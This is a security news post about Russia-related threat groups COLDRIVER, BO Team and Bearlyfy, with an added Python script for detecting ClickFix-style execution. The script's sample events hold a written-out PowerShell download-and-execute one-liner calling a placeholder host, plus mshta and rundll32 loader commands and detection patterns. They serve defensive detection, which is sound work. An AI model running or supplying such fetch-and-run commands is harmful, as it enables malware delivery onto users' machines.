👤 NEONPALADIN
🗓️ 14 Sep 2025   🌍 North America

Malware Crossfire: COLDRIVER, BO Team, and Bearlyfy Ignite a New Russian Cyber Battlefield

Three threat groups - COLDRIVER, BO Team, and Bearlyfy - unleash fresh waves of cyberattacks, signaling a volatile new chapter in Russia-focused digital warfare.

Fast Facts

  • COLDRIVER (aka Callisto) deploys new malware families - BAITSWITCH and SIMPLEFIX - using deceptive CAPTCHA lures.
  • BO Team targets Russian companies with revamped backdoors and phishing campaigns.
  • Bearlyfy, a newer player, escalates ransomware attacks against Russian firms, demanding cryptocurrency ransoms.
  • All three groups show growing technical sophistication, exploiting both human behavior and software flaws.
  • Geopolitical motives and shifting alliances blur the lines between cybercrime and cyberwarfare.

The Scene: Digital Deception and Escalation

Imagine a digital chessboard where each move is a trap, and every pawn is a potential spy. In recent months, Russia’s cyber landscape has turned into a high-stakes battleground, with multiple threat groups launching sophisticated attacks against both Russian targets and civil society figures connected to the country. COLDRIVER, BO Team, and Bearlyfy - each with their own playbook - are now shaping a new era of digital conflict, where malware is the weapon and deception is the strategy.

COLDRIVER’s ClickFix Gambit: Malware Hidden in Plain Sight

COLDRIVER, also known as Callisto or Star Blizzard, has been a persistent ghost in Western and Russian cyber corridors since 2019. Their latest campaign, uncovered by Zscaler ThreatLabz, uses a familiar but effective ruse known as ClickFix: a fake CAPTCHA page that asks the visitor to prove they are human by pasting a command into the Windows Run dialog. Victims, believing they are completing a routine verification, end up executing a malicious Windows file themselves, with no software exploit required. This first-stage malware, BAITSWITCH, quietly downloads a second program called SIMPLEFIX - a PowerShell backdoor that gives attackers remote control of the machine.

The technical wizardry is subtle but deadly. BAITSWITCH reaches out to attacker-controlled websites, fetches further malware, and erases its own tracks by scrubbing evidence from the system. SIMPLEFIX then sniffs around the victim’s files, searching for sensitive documents and sending back the spoils to its controllers. COLDRIVER’s focus remains tightly aligned with its past: targeting NGOs, exiled Russians, and civil society groups, often those critical of the Kremlin.
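Because a ClickFix lure needs the victim to run the command from the Run dialog, the first malicious process is a child of explorer.exe with a download-and-execute command line, which is a pattern endpoint telemetry can catch. The script below is an added example written for this page, not code from the Zscaler report or the article: it scores constructed, Sysmon-style process-creation events against ClickFix indicators. The indicator weights, the alert threshold, and every sample event (including the example.invalid hostname) are assumptions made for the demonstration.

```python
"""Heuristic triage of Windows process-creation events for ClickFix-style
execution (fake CAPTCHA -> user pastes a command into Win+R -> explorer.exe
spawns a LOLBin that downloads and runs a payload).

All events below are CONSTRUCTED samples, not real telemetry; field names
loosely follow Sysmon Event ID 1.  Weights and threshold are assumptions to
be tuned against your own baseline."""
import re

# Interpreters and living-off-the-land binaries that lures typically invoke.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (label, weight, pattern) - weights are an assumption for this demo.
INDICATORS = [
    ("hidden window", 1, re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("execution policy bypass", 1, re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass")),
    ("remote download", 2, re.compile(
        r"(?i)\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|certutil)\b|https?://")),
    ("in-memory execution", 2, re.compile(r"(?i)\b(iex|invoke-expression)\b|\|\s*iex")),
    ("user-writable path", 1, re.compile(r"(?i)\\(appdata|temp|downloads|public)\\")),
    ("captcha lure text", 2, re.compile(r"(?i)not a robot|verify you are human|captcha")),
]
THRESHOLD = 4  # assumption: alert at or above this score


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image, parent = _basename(event["Image"]), _basename(event["ParentImage"])
    cmdline = event.get("CommandLine", "")
    reasons = []
    if image not in LOLBINS:
        return 0, reasons
    score = 0
    if parent == "explorer.exe":           # Run dialog (and shell double-clicks) look like this
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog / shell)")
    for label, weight, pattern in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(label)
    # A DLL/script loader pulling its payload from a user-writable directory is
    # the shape of a dropped first stage, so weight it extra.
    if image in {"rundll32.exe", "regsvr32.exe", "mshta.exe"} and "user-writable path" in reasons:
        score += 2
        reasons.append("loader executing payload from user-writable path")
    return score, reasons


def detect_clickfix(events, threshold=THRESHOLD):
    """Return the events whose score meets the threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["ProcessId"], "image": ev["Image"],
                         "score": score, "reasons": reasons})
    return hits


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {"ProcessId": 4312, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "irm http://example.invalid/v.txt | iex" # I am not a robot'},
    {"ProcessId": 4410, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\victim\AppData\Local\Temp\verify.dll,Run"},
    {"ProcessId": 4500, "ParentImage": r"C:\Windows\explorer.exe",          # benign: interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"ProcessId": 812, "ParentImage": r"C:\Windows\System32\services.exe",  # benign: service host
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessId": 2204, "ParentImage": r"C:\Windows\System32\cmd.exe",      # benign: admin script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\deploy.ps1"},
    {"ProcessId": 5120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(f"pid={hit['pid']} score={hit['score']} {hit['image']}: {', '.join(hit['reasons'])}")
```

Running it flags the pasted PowerShell one-liner, the rundll32 load of a DLL from Temp, and the mshta fetch, while leaving the interactive shell, the service host, and the scheduled deployment script alone. explorer.exe parentage alone is weak evidence (double-clicking any file produces it), which is why the download and in-memory indicators carry the weight; in production you would feed real Sysmon or EDR events and tune the threshold against your own baseline.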

BO Team and Bearlyfy: New Faces, Familiar Tactics

While COLDRIVER perfects its art of deception, BO Team - sometimes called Black Owl or Hoody Hyena - has been phishing Russian companies with malware delivered inside password-protected archives, a packaging choice that keeps mail-gateway scanners from inspecting the contents. Their latest trick: delivering a BrockenDoor backdoor rewritten in C# alongside the multifunctional ZeronetKit, capable of remote spying, data theft, and even tunneling through networks. Notably, ZeronetKit has no persistence mechanism of its own; it relies on BrockenDoor to relaunch it every time the computer starts.

Enter Bearlyfy, a group that started with small-time ransomware attacks but quickly leveled up to bigger targets. Their weapon of choice? Notorious ransomware strains like LockBit 3.0 and Babuk, both of which have had their builders leaked, putting them within reach of crews with little development skill of their own. Bearlyfy exploits software flaws - sometimes entering through a compromised contractor or partner rather than the victim directly - to break in, encrypt data, and demand cryptocurrency ransoms. While the sums are often modest, enough victims pay up to make the attacks worthwhile. Analysts spot echoes of the pro-Ukrainian PhantomCore group in Bearlyfy's infrastructure, hinting at a tangled web of alliances and motives.

Geopolitics and the New Rules of Cyber Conflict

The convergence of these campaigns signals more than technical evolution; it’s a symptom of a shifting geopolitical chess game. Where once Russian companies and officials were the hunters, they’re now increasingly the hunted - by adversaries both foreign and homegrown, some possibly driven by nationalist, political, or even vigilante motives. The lines between espionage, activism, and outright crime grow blurrier by the day, leaving organizations caught in the crossfire of a digital shadow war.

As Russia’s cyber defenses are tested from all sides, these overlapping malware campaigns serve as a stark reminder: in the world of cyber conflict, today’s predator can be tomorrow’s prey. The only certainty is that the rules are changing, and everyone is a potential target.

WIKICROOK

  • Advanced Persistent Threat (APT): An Advanced Persistent Threat (APT) is a prolonged, targeted cyberattack by skilled groups, often state-backed, aiming to steal data or disrupt operations.
  • Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
  • Backdoor: A backdoor is a hidden way to access a computer or server, bypassing normal security checks, often used by attackers to gain secret control.
  • PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often abuse it to perform malicious actions stealthily, since it is signed, trusted, and already present on every Windows host.
  • Ransomware: Ransomware is malicious software that encrypts or locks data, demanding payment from victims to restore access to their files or systems.

NEONPALADIN, Cyber Resilience Engineer